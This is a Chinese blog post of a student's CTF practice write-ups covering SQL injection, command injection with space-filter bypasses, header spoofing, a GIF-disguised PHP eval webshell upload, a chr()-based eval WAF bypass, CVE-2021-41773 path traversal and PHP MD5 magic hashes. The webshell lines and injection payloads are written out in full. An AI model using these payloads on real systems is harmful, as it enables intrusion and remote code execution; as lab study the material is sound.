<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"harbeter.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":true,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="[极客大挑战 2019]LoveSQL尝试用万能密码，万能密码原理点这。 ?username&#x3D;1&#39;%23 &amp;password&#x3D;1这里用的是%23而没有用--+，--+不行的原因我也不太清楚， 得到一串很像md5加密的密文。但最终没有解出来。 然后进行常规的联合注入，得到 字段数：3 库名：geek 表名：geekuser，l0ve1ysq1 l0ve1ysq1表下的字段名：id，u">
<meta property="og:type" content="article">
<meta property="og:title" content="刷题记录-2">
<meta property="og:url" content="https://harbeter.github.io/2022/02/04/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95-1/index.html">
<meta property="og:site_name" content="像风吹过八千里">
<meta property="og:description" content="[极客大挑战 2019]LoveSQL尝试用万能密码，万能密码原理点这。 ?username&#x3D;1&#39;%23 &amp;password&#x3D;1这里用的是%23而没有用--+，--+不行的原因我也不太清楚， 得到一串很像md5加密的密文。但最终没有解出来。 然后进行常规的联合注入，得到 字段数：3 库名：geek 表名：geekuser，l0ve1ysq1 l0ve1ysq1表下的字段名：id，u">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://harbeter.github.io/2022/02/04/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95-1/image-20220211152257573.png">
<meta property="og:image" content="https://harbeter.github.io/2022/02/04/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95-1/image-20220212185644770.png">
<meta property="og:image" content="https://harbeter.github.io/2022/02/04/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95-1/image-20220212192414635.png">
<meta property="article:published_time" content="2022-02-04T07:40:38.349Z">
<meta property="article:modified_time" content="2022-02-12T12:47:45.187Z">
<meta property="article:author" content="Harbeter">
<meta property="article:tag" content="刷题">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://harbeter.github.io/2022/02/04/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95-1/image-20220211152257573.png">

<link rel="canonical" href="https://harbeter.github.io/2022/02/04/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95-1/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>刷题记录-2 | 像风吹过八千里</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">像风吹过八千里</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">流云和月都曾爱过你</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://harbeter.github.io/2022/02/04/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95-1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="Harbeter">
      <meta itemprop="description" content="愿你永远善良，永远向往未来！">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="像风吹过八千里">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          刷题记录-2
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-02-04 15:40:38" itemprop="dateCreated datePublished" datetime="2022-02-04T15:40:38+08:00">2022-02-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-02-12 20:47:45" itemprop="dateModified" datetime="2022-02-12T20:47:45+08:00">2022-02-12</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="极客大挑战-2019-LoveSQL"><a href="#极客大挑战-2019-LoveSQL" class="headerlink" title="[极客大挑战 2019]LoveSQL"></a>[极客大挑战 2019]LoveSQL</h1><p>尝试用万能密码，万能密码原理<a target="_blank" rel="noopener" href="https://blog.csdn.net/hxhxhxhxx/article/details/108020010">点这</a>。</p>
<p><code>?username=1&#39;%23 &amp;password=1</code>这里用的是<code>%23</code>而没有用<code>--+</code>，<code>--+</code>不行的原因我也不太清楚，</p>
<p>得到一串很像md5加密的密文。但最终没有解出来。</p>
<p>然后进行常规的联合注入，得到</p>
<p>字段数：3</p>
<p>库名：geek</p>
<p>表名：geekuser，l0ve1ysq1</p>
<p>l0ve1ysq1表下的字段名：id，username，password</p>
<p>geekuser表下的字段名：id，username，password</p>
<p>然后依次查看username和password，发现geekuser里面的用户名和密码就是用万能密码登录得到的，然后再查看l0ve1ysq1里面的用户名和密码，得到flag</p>
<h1 id="GXYCTF2019-Ping-Ping-Ping"><a href="#GXYCTF2019-Ping-Ping-Ping" class="headerlink" title="[GXYCTF2019]Ping Ping Ping"></a>[GXYCTF2019]Ping Ping Ping</h1><p>之前碰到一次Exec的题目，所以我们直接上Linux命令，但是发现<code>cat flag.php</code>和<code>cd ../</code>还有上传木马的<code>echo &#39;&lt;?php @eval($_POST[&#39;cmd&#39;]); ?&gt;&#39; &gt; hack.php</code> 等指令都用不了，看来是被过滤掉了，后来才知道这是过滤了空格space。</p>
<p><strong>过滤空格的解决办法</strong></p>
<ol>
<li>$IFS</li>
<li>${IFS}</li>
<li>$IFS$1 //$1改成$加其他数字貌似都行</li>
<li>&lt; </li>
<li>&lt;&gt; </li>
<li>{cat,flag.php}  //用逗号实现了空格功能</li>
<li>%20 </li>
<li>%09 </li>
</ol>
<p>一个一个试，发现只有<code>$IFS$1</code>管用，然后构造<code>cat$IFS$1flag.php</code>,结果提示过滤了flag字符串，所以试着cat一下index.php，结果如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">|\<span class="string">&#x27;|\&quot;|\\|\(|\)|\[|\]|\&#123;|\&#125;/&quot;, $ip, $match))&#123;</span></span><br><span class="line"><span class="string">    echo preg_match(&quot;/\&amp;|\/|\?|\*|\&lt;|[\x&#123;00&#125;-\x&#123;20&#125;]|\&gt;|\&#x27;|\&quot;|\\|\(|\)|\[|\]|\&#123;|\&#125;/&quot;, $ip, $match);</span></span><br><span class="line"><span class="string">    die(&quot;fxck your symbol!&quot;);</span></span><br><span class="line"><span class="string">  &#125; else if(preg_match(&quot;/ /&quot;, $ip))&#123;</span></span><br><span class="line"><span class="string">    die(&quot;fxck your space!&quot;);</span></span><br><span class="line"><span class="string">  &#125; else if(preg_match(&quot;/bash/&quot;, $ip))&#123;</span></span><br><span class="line"><span class="string">    die(&quot;fxck your bash!&quot;);</span></span><br><span class="line"><span class="string">  &#125; else if(preg_match(&quot;/.*f.*l.*a.*g.*/&quot;, $ip))&#123;</span></span><br><span class="line"><span class="string">    die(&quot;fxck your flag!&quot;);</span></span><br><span class="line"><span class="string">  &#125;</span></span><br><span class="line"><span class="string">  $a = shell_exec(&quot;ping -c 4 &quot;.$ip);</span></span><br><span class="line"><span class="string">  echo &quot;</span></span><br><span class="line"><span class="string">&quot;;</span></span><br><span class="line"><span class="string">  print_r($a);</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这段代码我也看不太懂，WP说是过滤了很多符号。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">方法一：我们构造/?ip=1;a=g;cat$IFS$1fla$a.php然后在注释里面得到flag</span><br><span class="line">方法二：cat$IFS$9`ls`,这里的反引号是内联，所谓内联，就是将反引号内命令的输出作为输入执行。</span><br><span class="line">方法三：echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh这句是先输出cat flag.php的base64编码，然后再解码，然后再执行。其中的|表示将前一个命令的输出作为后一个命令的输入。</span><br></pre></td></tr></table></figure>

<h1 id="极客大挑战-2019-Http"><a href="#极客大挑战-2019-Http" class="headerlink" title="[极客大挑战 2019]Http"></a>[极客大挑战 2019]Http</h1><p>进入题目后检查源码发现Secret.php文件，进入后查看源码未发现任何东西，而且给出的网址进不去。根据提示</p>
<p>**It doesn’t come from ‘<a target="_blank" rel="noopener" href="https://sycsecret.buuoj.cn&/#39;**%E6%84%8F%E6%80%9D%E5%B0%B1%E6%98%AF%E4%B8%8D%E6%98%AF%E6%9D%A5%E6%BA%90%E4%BA%8Ehttps://Sycsecret.buuoj.cn%E7%9A%84%E8%B5%84%E6%BA%90%EF%BC%8C%E4%B9%9F%E5%B0%B1%E6%98%AFReferer%E4%B8%8D%E6%98%AFhttps://Sycsecret.buuoj.cn%E3%80%82%E6%89%80%E4%BB%A5%E6%88%91%E4%BB%AC%E8%A6%81%E4%BF%AE%E6%94%B9header%E5%A4%B4%EF%BC%8C%E6%B7%BB%E5%8A%A0[Referer](https://blog.csdn.net/shenqueying/article/details/79426884)%EF%BC%8C%E8%BF%99%E9%87%8C%E7%94%A8Bp%E4%BF%AE%E6%94%B9%E3%80%82">https://Sycsecret.buuoj.cn&#39;**意思就是不是来源于https://Sycsecret.buuoj.cn的资源，也就是Referer不是https://Sycsecret.buuoj.cn。所以我们要修改header头，添加[Referer](https://blog.csdn.net/shenqueying/article/details/79426884)，这里用Bp修改。</a></p>
<p><code>Referer:https://Sycsecret.buuoj.cn</code></p>
<p>Request为</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/Secret.php</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>node4.buuoj.cn:28174</span><br><span class="line"><span class="attribute">Cache-Control</span><span class="punctuation">: </span>max-age=0</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>0</span><br><span class="line">Referer:https://Sycsecret.buuoj.cn</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>UM_distinctid=17d26e27951337-0f7088736cbf9a-b7a1438-144000-17d26e27952da6</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>注意Referer不能在Cookie下面，且不能乱空行。</strong>结果如图</p>
<p><img src="/2022/02/04/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95-1/image-20220211152257573.png" alt="image-20220211152257573"></p>
<p>所以我们继续修改浏览器标识</p>
<p><code>User-Agent:Syclover</code></p>
<p>全部Request为</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/Secret.php</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>node4.buuoj.cn:28174</span><br><span class="line"><span class="attribute">Cache-Control</span><span class="punctuation">: </span>max-age=0</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Syclover</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>0</span><br><span class="line">Referer:https://Sycsecret.buuoj.cn</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>UM_distinctid=17d26e27951337-0f7088736cbf9a-b7a1438-144000-17d26e27952da6</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>然后Response提示只能在本地浏览，则继续添加<a target="_blank" rel="noopener" href="https://www.runoob.com/w3cnote/http-x-forwarded-for.html">X-Forwarded-For</a>(<a target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/X-Forwarded-For">XFF</a>)</p>
<p><code>X-Forwarded-For:127.0.0.1</code></p>
<p>全部Request为</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/Secret.php</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>node4.buuoj.cn:28174</span><br><span class="line"><span class="attribute">Cache-Control</span><span class="punctuation">: </span>max-age=0</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Syclover</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>0</span><br><span class="line">Referer:https://Sycsecret.buuoj.cn</span><br><span class="line">X-Forwarded-For:127.0.0.1</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>UM_distinctid=17d26e27951337-0f7088736cbf9a-b7a1438-144000-17d26e27952da6</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br></pre></td></tr></table></figure>

<p>最终得到flag</p>
<h1 id="command-execution（攻防世界）"><a href="#command-execution（攻防世界）" class="headerlink" title="command_execution（攻防世界）"></a>command_execution（攻防世界）</h1><p>该题比较简单，但是注意cd ../然后再ls。这里也可以用<code>find / -name &quot;flag.txt&quot;</code>命令进行搜索，这里是猜测的文件名叫flag.txt如果不知道，那只能一个文件一个文件的找。</p>
<p>用<code>find / -name &quot;flag.txt&quot;</code>得知flag.txt在/home/flag.txt，然后用指令<code>cat /home/flag.txt</code>得到flag</p>
<h1 id="upload1（攻防世界）"><a href="#upload1（攻防世界）" class="headerlink" title="upload1（攻防世界）"></a>upload1（攻防世界）</h1><p>题目要求上传图片，gif不行，则随便上传一个图片，然后抓包更改后缀为.php，然后将代码</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GIF89a? <span class="tag">&lt;<span class="name">script</span> <span class="attr">language</span>=<span class="string">&quot;php&quot;</span>&gt;</span><span class="javascript"><span class="built_in">eval</span>($_REQUEST[<span class="number">1</span>])</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>复制进去，然后根据上传的位置，用蚁剑连接即可找到flag</p>
<h1 id="RoarCTF-2019-Easy-Calc"><a href="#RoarCTF-2019-Easy-Calc" class="headerlink" title="[RoarCTF 2019]Easy Calc"></a>[RoarCTF 2019]Easy Calc</h1><p>首先要了解php中的<a target="_blank" rel="noopener" href="https://www.w3school.com.cn/php/func_string_chr.asp">chr()函数</a>、<a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-directory-scandir.html">scandir()函数</a>、<a target="_blank" rel="noopener" href="https://www.runoob.com/php/php-var_dump-function.html">var_dump()函数</a>、<a target="_blank" rel="noopener" href="https://www.w3school.com.cn/php/func_filesystem_file_get_contents.asp">file_get_contents()函数</a></p>
<p>在源码中发现了<code>calc.php?num=</code>则访问calc.php发现部分源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">        <span class="variable">$blacklist</span> = [<span class="string">&#x27; &#x27;</span>, <span class="string">&#x27;\t&#x27;</span>, <span class="string">&#x27;\r&#x27;</span>, <span class="string">&#x27;\n&#x27;</span>,<span class="string">&#x27;\&#x27;&#x27;</span>, <span class="string">&#x27;&quot;&#x27;</span>, <span class="string">&#x27;`&#x27;</span>, <span class="string">&#x27;\[&#x27;</span>, <span class="string">&#x27;\]&#x27;</span>,<span class="string">&#x27;\$&#x27;</span>,<span class="string">&#x27;\\&#x27;</span>,<span class="string">&#x27;\^&#x27;</span>];</span><br><span class="line">        <span class="keyword">foreach</span> (<span class="variable">$blacklist</span> <span class="keyword">as</span> <span class="variable">$blackitem</span>) &#123;</span><br><span class="line">                <span class="keyword">if</span> (preg_match(<span class="string">&#x27;/&#x27;</span> . <span class="variable">$blackitem</span> . <span class="string">&#x27;/m&#x27;</span>, <span class="variable">$str</span>)) &#123;</span><br><span class="line">                        <span class="keyword">die</span>(<span class="string">&quot;what are you want to do?&quot;</span>);</span><br><span class="line">                &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="string">&#x27;echo &#x27;</span>.<span class="variable">$str</span>.<span class="string">&#x27;;&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>别人的wp说这是禁用了许多字符，我现在还看不懂。呜呜呜</p>
<p>然后构造</p>
<p><code>? num=var_dump(scandir(chr(47)))</code></p>
<p><strong>?和num之间有一个空格</strong></p>
<p><strong>原因是：假如waf不允许num变量传递字母，可以在num前加个空格，这样waf就找不到num这个变量了，因为现在的变量叫“ num”，而不是“num”。但php在解析的时候，会先把空格给去掉，这样我们的代码还能正常运行，还上传了非法字符。</strong></p>
<p><img src="/2022/02/04/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95-1/image-20220212185644770.png" alt="image-20220212185644770"></p>
<p>我们利用chr这个函数来构造函数内的字符串参数，就不需要用单双引号，从而成功绕过正则表达式。</p>
<p>然后构造</p>
<p><code>? num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))</code></p>
<p>这是/f1agg，然后即可得到flag</p>
<h1 id="CVE-2021-41773（实验室）"><a href="#CVE-2021-41773（实验室）" class="headerlink" title="CVE-2021-41773（实验室）"></a>CVE-2021-41773（实验室）</h1><p>说是一个apache2.4.49的漏洞，具体成因我也不太清楚，加cgi-bin的原因也不清楚，呜呜呜</p>
<p><img src="/2022/02/04/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95-1/image-20220212192414635.png" alt="image-20220212192414635"></p>
<p>这里的%2e是.的url编码，这里不能换成..  具体原因我也不太清楚，然后这里是在该位置下将内容输出到flag.txt文件中，结果为flag{This is CVE-2021-41773}</p>
<h1 id="MD5-各种比较（实验室）"><a href="#MD5-各种比较（实验室）" class="headerlink" title="MD5 各种比较（实验室）"></a>MD5 各种比较（实验室）</h1><h2 id="第一步"><a href="#第一步" class="headerlink" title="第一步"></a>第一步</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;./success.txt&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$name</span> = <span class="string">&quot;&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// step 1</span></span><br><span class="line"><span class="variable">$val1</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;val1&#x27;</span>];</span><br><span class="line"><span class="variable">$val2</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;val2&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>( <span class="variable">$val1</span> == <span class="variable">$val2</span> )&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;val1 OR val2 no no no&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>( md5(<span class="variable">$val1</span>) != md5(<span class="variable">$val2</span>) )&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;step 1 fail&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;step 1 ok !!!&quot;</span>;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>解释出来就是val1和val2的值不等但是md5解析相同，<strong>因为处理hash字符串时，PHP会将每一个以 0E开头的哈希值解释为0，那么只要传入的不同字符串经过哈希以后是以 0E开头的，那么PHP会认为它们相同</strong>这里<a target="_blank" rel="noopener" href="https://www.cnblogs.com/ainsliaea/p/15126218.html">参考</a></p>
<p>构造<code>?val1=s878926199a&amp;val2=s155964671a</code>成功过第一步</p>
<h2 id="第二步"><a href="#第二步" class="headerlink" title="第二步"></a>第二步</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// step 2</span></span><br><span class="line"><span class="variable">$thatfeelslike</span> = <span class="string">&quot;dcd385&quot;</span>;</span><br><span class="line"><span class="variable">$val3</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;val3&#x27;</span>];</span><br><span class="line"><span class="variable">$val4</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;val4&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>( <span class="variable">$val3</span> == <span class="variable">$val4</span> || is_array(<span class="variable">$val3</span>))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;val3 OR val4 no no no&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( substr(md5(<span class="variable">$val3</span>),<span class="number">0</span>,<span class="number">6</span>) !== substr(md5(<span class="variable">$val4</span>),<span class="number">0</span>,<span class="number">6</span>) || <span class="variable">$thatfeelslike</span> !== substr(md5(<span class="variable">$val3</span>),<span class="number">0</span>,<span class="number">6</span>) )&#123;</span><br><span class="line">    <span class="comment">// echo substr(md5($val3),0,5);</span></span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;step 2 fail&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;step 2 ok !!!&quot;</span>;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>val3和val4不能相等，且val3不是数组，且val3和val4的md5加密前六位都是dcd385，我这里实在找不到。上网搜到了<a target="_blank" rel="noopener" href="https://www.cnblogs.com/auzc/p/15845887.html">wp</a>，这里面提供了</p>
<p>构造<code>?val1=s878926199a&amp;val2=s155964671a&amp;val3=23902125&amp;val4=23027101</code></p>
